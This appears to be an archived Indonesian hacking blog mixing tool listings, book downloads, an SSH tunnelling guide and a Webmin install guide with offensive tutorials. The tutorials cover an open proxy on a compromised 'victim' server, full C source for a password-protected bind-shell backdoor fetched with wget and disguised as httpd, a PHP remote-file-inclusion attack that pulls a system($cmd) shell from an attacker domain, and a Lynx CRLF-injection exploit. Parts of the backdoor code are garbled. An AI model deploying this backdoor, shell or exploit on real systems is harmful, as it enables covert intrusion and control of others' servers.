pemprograman anda dapat membuat sebuah 'Mass Flooder' atau 'Brute Force
Flooder', tergantung pada kreatifitas anda !


.o0 Penanggulangan serangan Denial of Service

Sejujurnya, bagian inilah yang paling sulit. Anda bisa lihat bagaimana
mudahnya menggunaka sploits/tool untuk membekukan Ms Windows, atau
bagaimana mudahnya melakukan input flooding dan membuat tool sendiri.
Namun Denial of service adalah masalah layanan publik.Sama halnya dengan
anda memiliki toko, sekelompok orang jahat bisa saja masuk beramai-ramai
sehingga toko anda penuh. Anda bisa saja mengatasi 'serangan' ini dengan
'menutup' toko anda - dan ini adalah cara paling efektif - namun jawaban
kekanak-kanakan demikian tentu tidak anda harapkan.

1. Selalu Up 2 Date.
Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk membekukan
Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal
untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option
untuk menolak cracker untuk mengakses system.

2. Ikuti perkembangan security
Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal.
Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia
security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet'
dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak -
tidak tertutup kemungkinan untuk melakukan Denial of Service -.
Berhubungan dengan 'Selalu Up 2 Date', Denial of service secara langsung
dengan Flooding dapat diatasi dengan menginstall patch terbaru dari vendor
atau melakukan up-date.

3. Teknik pengamanan httpd Apache.
+ Pencegahan serangan Apache Benchmark.
Hal ini sebenarnya sangat sulit untuk diatasi. Anda bisa melakukan
identifikasi terhadap pelaku dan melakukan pemblokiran manual melalui
firewall atau mekanisme kontrol Apache (Order, Allow from, Deny From ).
Tentunya teknik ini akan sangat membosankan dimana anda sebagai seorang
admin harus teliti.
Mengecilkan MexClients juga hal yang baik, analognya dengan membatasi
jumlah pengunjung akan menjaga toko anda dari 'Denial of Service'.
Jangan lupa juga menambah RAM.

4. Pencegahan serangan non elektronik.
Serangan yang paling efektif pada dasarnya adalah local. Selain efektif
juga sangat berbahaya. Jangan pernah berfikir sistem anda benar-benar aman,
atau semua user adalah orang 'baik'. Pertimbangkan semua aspek. Anda bisa
menerapkan peraturan tegas dan sanksi untuk mencegah user melakukan serangan
dari dalam. Mungkin cukup efektif jika dibantu oleh kedewasaan berfikir dari
admin dan user bersangkutan.


.o0 Penututp.

Berbicara masalah security merupakan hal yang mengasikkan. Teknik-teknik
intrusi baru begitu unik dan sebagai seorang geek saya yakin 'keindahan
pengetahuan diatas segalanya'. Anda tidak akan melakukan hal-hal bodoh
seputar dokumen ini dan ingat selalu 'kita tidak pernah tahu segalanya'.
Mulailah belajar, perhatikan dunia dan kuasai ! Anda akan terkagum,
betapa indahnya semesta ini.
Terima kasih untuk anda semua telah membaca artikel ini - bahkan sampai
baris ini :) -. Terima kasih untuk rekan-rekan echo-staff atas support
selama ini. Untuk semua Computer Security Industries Indonesia, teruslah
berjuang Amigo !! Computer Underground, hey nak, sudah saatnya belajar
dan berhenti bermain. Semua teman-teman online TERIMA KASIH !!
Shout buat Willy, Al, Dudunk - semua pengunjung 'rumah mesum' :P
(cuma istilah/jargon) - Thanks buat Rizka, maaf atas 'pesan-pesan filosofi
gelap', kamu tahu pemilik nomor 08157190*** !. "Ka .. tidak baik marah
kepada seseorang yang datang dengan kasih sayang :)"

"KALAU AKU SEORANG ATEIS, MAKA AKAN AKU KATAKAN:
'TEMPAT YANG PALING AMAN ADALAH PETI MATI'
TAPI TERNYATA AKU SALAH !!"
[MOBY]


Bacaan lanjutan / referensi:

[1] Kejahatan Internet, Trik Aplikasi dan Tip Penanggulangannya.
R. Kresno Aji, Agus Hartanto, Deni Siswanto, Tommy Chandra Wiratama.
Elexmedia Komputindo, ISBN: 979-20-3249-5
[2] 7 Cara Isengi Apache dan kiat mengatasinya.
Steven Haryanto, Masterweb Magazine Oktober 2001
[3] Introduction to Denial of Service
Hans Husman, t95hhu@student.tdb.uu.se
[4] CERT ADVISORIES.
www.cert.org
[5] Packet Storm Security
http://packetstormsecurity.nl
[6] BugTraq
www.securityfocus.com
Posted by admin Labels:
Saturday, November 24, 2007 at 8:18 AM | 0 comments  



Introduction
Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

Nmap is ...

  • Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
  • Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
  • Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
  • Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
  • Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
  • Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, and tutorials. Find them in multiple languages here.
  • Supported: While Nmap comes with no warranty, it is well supported by the community and we appreciate bug reports and patches. If you encounter a problem, please follow these instructions.
  • Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
  • Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.
Source Code Distribution
This is the traditional compile-it-yourself format. The Nmap tarball compiles under UNIX (including Linux, Solaris, Free/Net/OpenBSD, and Mac OS X) and Windows. It includes Zenmap, the GUI frontend. Nmap is now offered in bzip2 format as well as traditional gzip.

Detailed compilation instructions and options are provided here, though this usually does the trick for Linux/BSD/Solaris systems:

bzip2 -cd nmap-4.23RC2.tar.bz2 | tar xvf -
cd nmap-4.23RC2
./configure
make
su root
make install

Latest development Nmap release tarball (recommended): nmap-4.23RC2.tar.bz2 (or gzip compressed)

Latest stable Nmap tarball: nmap-4.20.tar.bz2 (or gzip compressed)
Posted by admin Labels: ,



SuperScan is a powerful TCP port scanner, that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques resulting in extremely fast and versatile scanning. You can perform ping scans and port scans using any IP range or specify a text file to extract addresses from. Other features include TCP SYN scanning, UDP scanning, HTML reports, built-in port description database, Windows host enumeration, banner grabbing and more.

Product Detail
Publisher Foundstone Inc.
File Size196 kb
Version4.0
Last updatedApr 01, 2006
LicenseFreeware
Windows2000/XP
RequirementsNone
Other productsAll 4 products from this developer
Download SuperScan
Posted by admin Labels: ,



John the Ripper is a fast password cracker. Its primary purpose is to detect weak Unix passwords. Besides several crypt password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Platform:Linux
Last update:29 May 2006
Developer:Alexander Peslyak
File type:.tar.gz

File size:790 Kb
License:GNU GPL
Category:Passwords

Downloads:23483
Download
Posted by admin Labels: ,
Friday, November 23, 2007 at 10:29 AM | 0 comments  



Holes by Jack Koziol et al.
John Wiley & Sons © 2004 (644 pages)
ISBN:0764544683

Stop hackers from wreaking havoc on your software applications and operating systems. This innovative book provides tools to discover vulnerabilities in C-language-based software, exploit what you find, and prevent new security holes from occurring.




download click here
Posted by admin Labels: , ,



by Victor Oppleman, Oliver Friedrichs and Brett Watson
McGraw-Hill/Osborne © 2005 (448 pages)
ISBN:0072259558

Back Cover
Protect your network and web sites from malicious attacks with help from this cutting-edge guide. Extreme Exploits is packed with never-before-published advanced security techniques and concise instructions that explain how to defend against devastating vulnerabilities in software and network infrastructure. This book gives you detailed analyses of modern threats and their solutions along with checklists for developing defenses. You’ll also be introduced to a winning methodology for custom vulnerability assessments including attack profiling and the theatre of war concept. Through in-depth explanations of underlying technologies, you’ll learn to prepare your network and software from threats that don’t yet exist. This is a must-read volume for anyone responsible for network security.

  • Secure your critical domain name system (DNS) infrastructure
  • Ensure reliable Internet connectivity amidst a myriad of attacks
  • Implement effective intrusion detection and prevention technologies
  • Prevent e-mail abuse using advanced filtering, encryption, and other methods
  • Stop data theft and egress exploitation by altering packet filtering rules
  • Defend against viruses, worms, bots, Trojans, and other malicious code
  • Use IP sinkholes and backscatter analysis to trap and gain knowledge from scanning and infiltration attempts
  • Secure wireless networks using a variety of technologies
  • Create a customized vulnerability assessment methodology for your organization
  • Use proven digital forensics techniques to investigate attacks
  • Learn to protect your software from little-known vulnerabilities
download click here
Posted by admin Labels: , ,
Thursday, November 22, 2007 at 2:46 AM | 0 comments  



Banyak applikasi web yang mempunyai security dan pemblokiran IP, apalagi ip negara kita .....lol
dan fungsi dari Proxy ini dapat kamu gunakan untuk mengganti IP kamu dengan IP shell server yang
berhasil kamu kuasai dan kamu bisa menggunakanya untuk mirc, web browser, dan applikasi lain
lain dalam internet networking. ok, lantas caranya ???

source: click here

sh-2.05b$ hostname -i
95.154.214.125 <--- victim shell server

sh-2.05b$ tar -zxvf proxy.tar.gz
sh-2.05b$ cd proxy
sh-2.05b$ ./proxy -h
Usage: ./proxy options
Available options are:
-d go to background (daemon)
-fFORMAT logging format (see do*****entation)
-l log to stderr
-lFILENAME log to FILENAME
-bBUFSIZE size of network buffer (default 4096 for TCP, 16384 for UDP)
-l@IDENT log to syslog IDENT
-t be silenT (do not log service start/stop)
-iIP ip address or internal interface (clients are expected to connect)
-eIP ip address or external interface (outgoing connection will have this)
-pPORT - service port to accept connections
-a - anonymous proxy
-a1 - anonymous proxy with random client IP spoofing
Example: ./proxy -i127.0.0.1


(c)2000-2006 3APA3A, Vladimir Dubrovin & Security.Nnov
Do*****entation and sources: http://www.security.nnov.ru/soft/3proxy/
Please read license agreement in ''copying'' file.
You may not use this program without accepting license agreement

sh-2.05b$ ./proxy -d -a -p [port] misal :
sh-2.05b$ ./proxy -d -a -p9999

nah nah nah,.... sekarang buka iexplore kamu menu : tools --> internet options... --> connections --> LAN Settings.. -->

proxy server: address: 95.154.214.125 Port: 9999 --> ok

untuk mengecek apakah proxy kamu berhasil buka web kamu dengan url http://cmyip.com
kamu liat apakah info tersebut sudah menggunakan IP shell kamu --> 95.154.214.125 (victim shell server)
bila sudah berarti kamu sudah bisa menggunakan proxy tersebut untuk hal laen, tp ingat jangan
kamu gunakan untuk hal hal yang berbau desduktif terlebih lagi CC, tp kalo kamu tetep ngotot
kami selaku penulis tidak bertanggung jawab atas penyalah gunaan tutorial di atas
sekian tutorial dari saya.
Posted by admin Labels:



Untuk yang sudah jago kungfunya tentunya akan tertawa membaca tutorial kali ini.tp kalo hanya untuk baca-baca saja apasalahnya ;P', ' pada saat anda sudah dapat memasuki system web, pasang bind adalah bagian lumayan penting dalam remote command shell karena kita sudah tidak perlu repot-repot lagi meremote nya via http (web). Langsung tanpa basa-basi saya akan memulainya:

----------------------------------------------------------------------------------------
#define HOME "/"
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0x5413
#define TIOCSWINSZ 0x5414
#define ECHAR 0x1d
#define PORT 5555 /* pake sembarang port */
#define BUF 32768
#define proc "/usr/sbin/httpd" /*Change this for Fake BG proces */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};
int sc;
char passwd[] = "pluto"; /* ubah dengan password kamu*/
char motd[] = ".::[ dr.pluto b4ckd00r for nix ]::.n";
void cb_shell() {
char buffer[150];
write(sc, "Password: ", 10);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, "Cok Password Salah!!!n", 7);
close(sc); exit(0);
}
}
/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
char series[] = "pqrstuvwxyzabcde";
char subs[] = "0123456789abcdef";
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}
/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;
fd = open("/dev/ptmx", O_RDWR);
close(fd);
for (i=0; i < pty =" open(buf," tty =" open(buf," sock =" socket(AF_INET," sin_family =" AF_INET;" s_addr =" htonl(INADDR_ANY);" sin_port =" htons(PORT);" pid =" fork();" pid =" %dn" pid =" open(" slen =" sizeof(cli);" scli =" accept(sock," pid =" fork();" pid ="="" home="%s" j =" 0;" i =" read(scli,">= MAXENV) || (i < subshell =" fork();" subshell ="=""> scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < count =" read(pty," d =" buf;" count =" read(scli," p =" memchr(buf," rlen =" count"> 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < ws_xpixel =" ws.ws_ypixel" ws_col =" (wb[1]" ws_row =" (wb[3]" rlen =" ((ulong)"> 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break; } } close(scli); close(sock); close(pty); waitpid(subshell, NULL, 0); vhangup(); exit(0); } close(scli); } } ----------------------------------------------------------------------------------------


weh,....sep-sep,... bila ingin merubah port nya rubah sesuai keinginan kamu, tp ingat jangan dibawah 4 digit karena biasanya sudah dipakai oleh system-system yang laen
#define PORT 5555 /* pake sembarang port */
char passwd[] = "pluto"; /* ubah dengan password kamu*/


yang perlu kamu rubah, tp kita contohkan secara defoudt,
nanh untuk selanjutnya ente upload di server kamu, misal :
http://web_server_kamu/bind.c
ok, pada text box command ada tinggal mendownload di server target dan meng-compile nya saja
cmd:$wget http://web_server_kamu/bind.c
cmd:$gcc -o bind bind.c
supaya sang admin ga curiga dengan program tersebut rubah dengan nama yang meyakinkan, misal httpd, bash, atau terserah kamu lah, saya yakin anda lebih jago untuk hal penipuan dari pada saya, hiiiiiiiiiiiiii..........! lol.
cmd:$mv bind httpd
cmd:$./httpd
dr.pluto Bind Is Beginning...Seep, pid = 6782
dr.pluto Private Only..
bind sudah ter execute pada pid 6782,untuk langkah selanjutnya buka putty,Host name (or Ip Address):[ip/hostname target], port: 5555, Protokol: telnet, Enter...


Password: pluto
pluto
.::[ dr.pluto b4ckd00r for nix ]::.
sh-2.05b$
sh-2.05b$


bila muncul tanda sh (sh-2.05b$) itu tandanya kamu sudah masuk dalam system target, untuk selanjutnya terserah kamu, mo buat psy,eggdrop,ngeroot, atau *****an liat-liat isi server itu terserah kamu,..... ;P
Tapi bila kamu masih lom berhasil juga, liat apa port na dah bener, mungkin aborting (sedang di pakai oleh system laen),kalo kamu merasa port na dah bener mase lom bisa juga mungkin kamu perlu membeli sebotol baygon untuk di tenggak, wakakakakaka.......... lol ;p~

selesai...
koran sehari-hari:xpl.netmisphere2.com, www.milw0rm.com, www.rohitab.com
Posted by admin Labels:
Tuesday, November 20, 2007 at 10:25 AM | 0 comments  




This is a short introduction to SSH tunnelling (also known as "port
forwarding"). It describes with some simple examples how a user can
establish an apparently direct connection to any machine in the
Garchinger Campus, despite the newly enforced restricted access to a selected
number of machines.


Let's define our sample setup: We have a PC at home called mypc. We
want to connect to a computer in Garching called work, but we are
only allowed to connect to a gateway machine called gate:





The normal way would be a two step process: first connect from
mypc to gate and then from gate to

work. Let's see how a tunnel can help:



  • Case 1: From a Unix-like machine


    The following refers to OpenSSH 2.x and 3.x:



    On mypc we execute this command:


    ssh -l myuserid -L 7777:work:22 gate cat -


    This means: open an ssh connection as user myuserid to host
    gate and execute the command cat -. While the session is
    open, redirect all connections to port 7777 on the local machine to
    port 22 on machine work.



    Now we can use any SSH command (ssh, slogin, scp,

    sftp) to connect directly to work through the
    tunnel. For example:


    ssh -p 7777 localhost uname -a

    slogin -p 7777 localhost

    scp -p -P 7777 localhost:data/file1.txt .

    sftp -oPort=7777 localhost





    How it works:



    The ssh process on the local machine mypc establishes an
    SSH connection with the sshd server process on the gateway
    machine gate. It uses the well-known port 22 on the
    server side and some free port on the local machine, e.g. 605. In
    addition, because we have used the -L option, the local

    ssh process accepts local connections to port 7777 and
    sends all data received on this port through the other port 605
    to gate with some marking "this is from tunnel 7777". The
    gateway gate has been informed through the -L option
    that, whenever it receives data marked with "this is from tunnel
    7777", it has to open a connection to host work on port 22 and
    send it that data:






    Some remarks:





    1. The cat - command in the first ssh command is there only to
      keep the connection open. Any other command which does not finish
      could be used. It could be left blank, too, thereby opening a shell,
      but then you need a controlling terminal and cannot use the ssh
      command in a script.



    2. You can use any port above 1024 and below 32768 for the -L option.



    3. If you need to connect to several machines, then just specify more
      -L options in the first ssh command, one per machine, each with
      a different local port. For example:

      ssh -l myuserid -L 7777:work1:22 -L 7778:work2:22 -L 7779:work3:22 gate cat -

      then use ssh -p 7777 localhost to connect to work1,

      ssh -p 7778 localhost to connect to work2, etc.



    4. You can also redirect to other remote ports. For example, if
      machine work accepted telnet connections (port 23), then
      you could prepare the tunnel with:


      ssh -l myuserid -L 7777:work:23 gate cat -



      and then just telnet to work with this command:


      telnet localhost 7777


      The port numbers of usual network services can be found in file
      '/etc/services'.



    5. You can write a small script to setup the SSH tunnel for all
      connections you normally need and call that script automatically every
      time you connect from home to the Internet.



    6. You can define aliases for connections which you need very
      often. For example, if you do (in a tcsh):

      alias sshwork 'ssh -p 7777 localhost'

      then you can simply do things like:

      sshwork uname -a

      sshwork ps -ef

      sshwork (to login)




    7. With some more complex aliases or shell scripts you can almost work
      as with a direct connection. For example, if you do:


      alias ssh \
      'set target=`echo \!^ | sed -e "s/work/-p 7777 localhost/g"` ; \
      /usr/local/bin/ssh $target \!:2*'

      then you can do:

      ssh work ps -ef



    8. If you use the -v option for the ssh command which prepares
      the tunnel, then you can see in its output whenever a connection is
      established through the tunnel (and other debug messages).
Posted by admin Labels:



by Jon Erickson
ISBN:1593270070
No Starch Press © 2003 (241 pages)
This text introduces the spirit and theory of hacking as
well as the science behind it all; it also provides some
core techniques and tricks of hacking so you can think
like a hacker, write your own hacks or thwart potential
system attacks.
Download here: htae.zip
Posted by admin Labels: , ,
Saturday, November 17, 2007 at 7:06 PM | 0 comments  



PROGRAM: Lynx
VENDOR: Lynx-Dev
HOMEPAGE: http://lynx.browser.org/
VULNERABLE VERSIONS: 2.8.4rel.1, 2.8.5dev.8, 2.8.3rel.1, 2.8.2rel.1,
possibly others
IMMUNE VERSIONS: 2.8.4rel.1 with all patches applied
PATCH: ftp://lynx.isc.org/lynx2.8.4/patches/lynx2.8.4rel.1c.patch
SEVERITY: medium


DESCRIPTION:

"Lynx is a fully-featured World Wide Web (WWW) client for users
running cursor-addressable, character-cell display devices such
as vt100 terminals, vt100 emulators running on Windows 95/NT or
Macintoshes, or any other character-cell display. It will display
Hypertext Markup Language (HTML) documents containing links to files
on the local system, as well as files on remote systems running
http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and
services accessible via logins to telnet, tn3270 or rlogin accounts.
Current versions of Lynx run on Unix, VMS, Windows95/NT, 386DOS
and OS/2 EMX."

(direct quote from the program's README file)

Lynx is published under the terms of the GNU General Public License.
It is a very common program (I personally have used it since 1995),
but this hole will only affect some of its users.


SUMMARY:

If you give Lynx a URL with some special characters on the command
line, it will include faked headers in the HTTP query. This way,
you can make scripts that use Lynx for downloading files access
the wrong site on a web server with multiple virtual hosts.


TECHNICAL DETAILS:

When a URL is given on the command line or in the WWW_HOME
environment variable, Lynx doesn't remove or encode dangerous
characters such as space, tab, CR and LF before constructing HTTP
queries. This means that an attacker can construct a URL that will
send arbitrary faked HTTP headers, by adding space + "HTTP/1.0" +
CRLF + some headers + CRLF + CRLF after the normal URL. Lynx's own
HTTP headers are sent after the faked headers, but the web server
ignores them, as our CRLF + CRLF pair above indicates the end of
the headers.

This may cause some security problems. One scenario is when a
program starts Lynx, and the host part of the URL is supplied
by the program and the path by its user (something like "lynx
http://www.site3.st/$path", where the value of $path is defined by
the user). An attacker can make such a program access some other web
site than www.site3.st, if it's a virtual host on the same machine
as www.site3.st, by adding a "Host:" header as described above.

Relative links don't work in web pages that are fetched this way. If
there is a relative link like Sunnan
and the user follows it, Lynx gets confused.

To get more information about this type of hole,
read my paper "CRLF Injection", which is available at
http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html


PERL EXPLOIT:

#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st

die "$0 hostone hosttwo\n" if @ARGV != 2;

exec('lynx "'.
"http://$ARGV[0]/ HTTP/1.0\012".
"Host: $ARGV[1]\012\012".
'"');


BASH COMMAND LINE EXPLOIT:

(This exploit assumes that www.site1.st and www.site2.st are virtual
hosts on the same machine. Lynx will show www.site2.st.)

[ulf@metaur ulf]$ lynx "http://www.site1.st/ HTTP/1.0
Host: www.site2.st

"


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 13th of August. Their patch was
released and announced on the Lynx-Dev list on the 18th.


// Ulf Harnhammar

rewrite by admin
Posted by admin Labels:



Often was encountered by us the weakness to some website with bug rfi and with the different method the difference that became the question, why that could happen?
All that could happen because source code that in publiblik and circulated in the market, definitely everyone could study and analyse some cms (Content Management System), and in fact include from php personally not some bug but a function for the merging of the different library.
An example:


/*************************************
* project : test include
* file name : var.php
************************************
*/
$a = 10;
$b = 3;
?>


/*************************************
* project : test include
* file name : add.php
************************************
*/
include("var.php")
$s_add = $a + $b;
print $a." + ".$b." = ".$s_add;
?>

Then after being undertaken by you add.php will get report 10 + 3 of = 13
really were easy not?
The other example:


/*************************************
* project : test include
* file name : passwd.php
************************************
*/
include("/etc/passwd")
?>


In script passwd.php would in received ouput as follows:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...

And of course site will access the address url when getting the request from other url
like:


/*************************************
* project : test include
* file name : httP://www.youdomain.com/shell.txt
************************************
*/

system($cmd)
?>


/*************************************
* project : test include
* file name : httP://www.target.com/vul.php
************************************
*/

include($path_include."include/config.inc.php");
print $head;
bla...bla...bla...
?>

With vul.php that without in accompanied the filter input then script this suddah became the security gap, and with the request http://www.target.com/vul.php?path_include=http://www.youdomain.com/shell.txt an infiltrator has gotten access command
tried to be carried out by us the trial with the request:

http://www.target.com/vul.php?cmd=cat%20/ect/passwd&path_include=httP://www.youdomain.com/shell.txt

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...

http://www.target.com/vul.php?cmd=ls%20-lia&path_include=httP://www.youdomain.com/shell.txt

28 -rwxr-xr-x 1 john john 25141 Oct 30 2006 archive.php
4 -rw-r--r-- 1 john john 522 Sep 10 05:38 config.inc.php
4 -rwxr-xr-x 1 john john 510 Oct 30 2006 config.inc.php.sample
8 -rwxr-xr-x 1 john john 5724 Oct 30 2006 crop.inc.php
8 -rwxr-xr-x 1 john john 5014 Oct 30 2006 debugger.inc.php
4 -rwxr-xr-x 1 john john 213 Oct 30 2006 vul.php

In this way we you have gotten access command
so many previously the article from me, it is hoped useful
Sorry when this article was not better because I still needed often studied

Posted by admin Labels:



by dr.pluto
A-LIST Publishing © 2005
Download : rnv.zip


Posted by admin Labels: , , ,




by Marsel Nizamutdinov
A-LIST Publishing © 2005 (400 pages)
ISBN:1931769494
Download : HWEU.zip


Table of Contents
Hacker Web Exploitation Uncovered
Introduction
Chapter 1 - The Internet Is a Hostile Environment
Chapter 2 - Vulnerabilities in Scripts
Chapter 3 - SQL Injection
Chapter 4 - Secure Authorization and Authentication
Chapter 5 - XSS and Stolen Cookies
Chapter 6 - The Myth about Secure Configuration
Chapter 7 - Shared Hosting and Security Issues
Chapter 8 - A Conceptual Virus
Appendix 1 - CD-ROM Contents
Appendix 2 - Investigation Tasks
Appendix 3 - Solutions

Posted by admin Labels: , ,



NGSSoftware Insight Security Research Advisory

Name: Multiple Buffer Overruns RealOne / RealPlayer / RealOne Enterprise
Desktop
Systems Affected: Windows All
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.real.com/
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 22nd November 2002
Advisory number: #NISR22112002


Description
***********
RealOne / RealPlayer is one of the most widely used products for internet
media delivery. According to Real, there are currently around 115 million
users worlwide of these products. RealOne is the updated version of
RealPlayer. Both suffer from multiple overrun issues.

Details
*******
This advisory details three remotely exploitable overruns, two being heap
based overflows and the other being a stack based overflow. On exploitation
of these overruns any supplied code would execute in the security context of
the logged on user.

1) By following a link to a SMIL file (Synchronized Multimedia Integration
Language), RealPlayer will automatically download the file in an attempt to
play its content. By suppling an overly long paramter within the SMIL file
a heap overflow would occur in RealPlay.exe. According to Real, they have
fixed the issue by fixing the player status code to handle the cases where
there are large number of characters in the metadata of a smil file.

2) By suppling an overly long rtsp:// filename parameter, for example
within a .m3u file, when a link was followed, Real again would download the
file. When play is selected a heap overflow ocurrs in RealPlay.exe This
has apparently been fixed by Real by improving the robustness of URL
handling in this portion of the product.

3) Again, referring to number two if the 'victim' were to download the file
with a large filename (whether it was on local/rtsp or an http url) Real
Player would access violate when performing the following: If the user were
to right click in Now Playing and select "Edit Clip info" or right click in
"Now Playing" and "Select copy to my Library". In this particular instance
a stack overflow would occur in RealPlayer.


Fix Information
***************
NGSSoftware alerted Real to these problems on the 1st November 2002.
NGSSoftware highly recommend installing the patch found at
http://service.real.com/help/faq/security/bufferoverrun_player.html.
Alternatively if you Open RealPlayer - Help - About Real Player, you will
notice a Check For Updates feature. Select this.

In Real's own advisory they omit the fact that RealOne Enterprise Desktop is
also vulnerable, but only to issues 2 & 3.


Further Information
*******************
For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
Posted by admin Labels:



Kita tentunya sudah mengenal Unix atau Linux, yaitu merupakan sistem operasi komputer yang jenisnya beragam, mulai untuk kelas PC sampai Mainframe. Kalo kita bicara Unix/Linux pasti kita melihat bahwa Linux itu adalah sistem operasi yang masih menggunakan command line untuk mengadministrasi-nya, dan kelihatanya agak rumit.
Penulis mencoba membahas masalah tools/alat untuk memudahkan proses "admin" di OS Unix khususnya Linux, yaitu dengan adanya Webmin.

Apa itu Webmin
Webmin adalah sebuah tools/media yang Free yang disediakan di http://www.webmin.com, berbasiskan Web. Dapat menggunakan browser apapun yang mendukung form, table dan java dan CGI. Sebelum kita menggunakan Webmin ini yang harus kita miliki adalah PERL5.

Rasanya penulis tidak dapat menjelaskannya lebih detail, untuk keterangan lebih detail anda bisa baca di http://www.webmin.com/webmin/ untuk itu kita langsung saja ketahapan berikutnya yaitu bagaimana cara menggunakan dan installasi ?


Installasi
Untuk menginstall webmin sebenarnya cukup sederhana, silahkan download source code di ftp://ftp.webmin.com/webmin-0.72.tar.gz tapi sebelumnya apakah Perl5 sudah terinstall di Linux anda ? jika belum silahkan isntall Perl5 dahulu.
Setelah anda dapat source webmin tersebut silahkan ikuti langkah dibawah ini, tetapi anda harus login sebagai root.

Extract file webmin-0.72.tar.gz
Misalnya file tersebut disimpan dalam direktori : /root
[root@netcom /root ]# tar zvxf webmin-0.72.tar.gz –C /usr/local/

[root@netcom /root ]# cd /usr/local/webmin-0.72

atau

[root@netcom /root ]# gzip –d webmin-0.72.tar.gz

[root@netcom /root ]# tar xf webmin-0.72.tar.gz –C /usr/local/

[root@netcom /root ]# cd /usr/local/webmin-0.72

Jalankan Script "setup.sh"
Setelah anda masuk ke direktori webmin tersebut, langkah selanjutnya jalankan script setup.sh yang terdapat pada direktori webmin tersebut.
Selanjutnya script tersebut akan menanyakan beberapa pertanyaan :

Direktori komfiguarsi Webmin

Konfigurasi-konfigurasi dari webmin ini akan disimpan didirektori mana ? secara "default" adalah /etc/webmin.

Direktori log webmin

Untuk lokasi no PID dan log webserver.

Alamat lengkap Perl5 dalam Linux

Biasanya /usr/bin/perl atau /usr/loca/bin/perl

Jenis Sistem Operasi yang anda gunakan.

Misalnya SunOS, Linux à Linux Redhat 4, 5.X, 6 / Slackware dsb

"Port" untuk Webserver

Digunakan untuk port listernet webmin, default-nya 10000, contoh mengaksesnya :

http://www.domainanda.com:10000

Webserver Login dan Password

Untuk mengakses webmin dibutuhkan user, user pertama ini akan berungsi sebagai Administator untuk webmin, jadi jangan sampai lupa password.

Nama host

Nama host untuk server yang menjalankan webmin.

Jalankan Webmin pada saat boot ?

Jika ingin menjalankan webmin pada saat boot server silahkan jawab.

Dengan demikian selesai sudah proses installasi tinggal anda menggunakannya, Sekarang bagaimana tanggapan anda tentang Linux ???? Menarik bukan ??

